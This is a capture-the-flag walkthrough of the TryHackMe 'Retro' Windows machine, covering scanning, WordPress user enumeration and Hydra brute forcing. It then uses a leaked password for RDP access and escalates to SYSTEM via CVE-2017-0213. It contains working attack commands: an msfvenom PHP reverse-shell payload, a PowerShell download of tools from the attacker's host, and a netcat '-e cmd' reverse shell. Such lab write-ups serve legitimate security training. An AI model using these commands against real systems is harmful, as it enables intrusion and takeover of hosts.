Retro THM{}
Nmap
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=RetroWeb
| Not valid before: 2022-04-06T16:54:22
|_Not valid after: 2022-10-06T16:54:22
|_ssl-date: 2022-04-07T17:05:49+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: RETROWEB
| NetBIOS_Domain_Name: RETROWEB
| NetBIOS_Computer_Name: RETROWEB
| DNS_Domain_Name: RetroWeb
| DNS_Computer_Name: RetroWeb
| Product_Version: 10.0.14393
|_ System_Time: 2022-04-07T17:05:49+00:00
Gobuster
http://10.10.228.64/retro/wp-login.php WORDPRESS LOGIN
http://10.10.228.64/retro/wp-content/ WHITE
http://10.10.228.64/retro/wp-includes/ FORBIDDEN
Wpscan
http://10.10.228.64/retro/index.php/wp-json/wp/v2/users/ USER "wade"
Hydra
hydra -l wade -P /usr/share/wordlists/rockyou.txt.gz 10.10.228.64 http-form-post '/retro/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=%2Fretro%2Fwp-admin%2F&testcookie=1:The password you entered for the username' -V
Does not work
Webpage comments
In the webpage's comments, we find this:
Leaving myself a note here just in case I forget how to spell it: parzival
So, acknowledging that the user is wade, we try wade:parzivaland can connect to the administration panel.
Method 1. Using RDP
We can connect to the remote machine through RDP using the obtained credentials.
xfreerdp /p:'parzival' /u:'Wade' /v:10.10.228.64
Now we have the first flag.
Method 2 Wordpress to shell
Like in Mr Robot and Internal, we can obtain a reverse shell uploading a .php.
This time the pentestmonkey does not work so we need to use one created with msfvenom.
- We follow the first method of https://www.hacknos.com/wordpress-shell-upload/ , taking into account that the upload folder is the current year and month.
- To create the payload, we can use this resource: https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ , choosing the php one.
msfvenom -p php/reverse_php LHOST=10.11.62.63 LPORT=4444 -f raw > shell1.php
Winpeas
- We transfer the file
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.62.63:8000/Winpeas.exe', 'C:\Users\Wade\Winpeas.exe')" - We transfer
nc.exeusing the same mehtod - Start nc on the host
nc -lnvp 5555 - Connect to our host
nc64.exe 10.11.62.63 5555 -e cmd - Execute Winpeas
In case we have RDP, we transfer Winpeasand write this on cmd REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1. After that, restart another CMD and execute Winpeas.
CVE-2019-1388 Exploit
If we dig into the bin, we find a file named hhupd. Also there is a bookmark in the chrome browser refering to the CVE-2019-1388.
CVE-2017-0213 Exploit
This is another vulnerability much more easier to exploit, this is the one that we will follow.
On one hand, this vulnerability is not shown in the WinPeas scan, so, to discover it, we need to check the Version/Build:
systeminfo
Microsoft Windows Server 2016 Standard 10.0.14393 N/A Build 14393
Finding on google, we discover the available exploit. https://steflan-security.com/tryhackme-retro-walkthrough/
We transfer the exploit to the windows machine and execute it. A new window appears and now we are nt authority\system